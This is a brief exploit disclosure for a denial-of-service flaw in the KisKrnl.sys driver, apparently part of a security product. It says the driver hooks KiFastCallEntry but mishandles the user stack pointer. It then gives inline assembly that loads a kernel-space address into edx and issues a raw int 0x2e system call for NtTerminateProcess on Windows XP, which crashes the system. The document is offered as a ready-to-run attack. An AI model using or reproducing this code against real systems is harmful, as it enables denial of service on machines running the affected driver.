D.O.S Exploit
DETAILS:
KisKrnl.sys hook the kernel function KiFastCallEntry , but is not correctly handle
user stack pointer
EXPLOIT CODE:
__asm
{
mov edx , 0x80000000
mov eax , 0x101 ;id of NtTerminateProcess under Windows XP
int 0x2e
}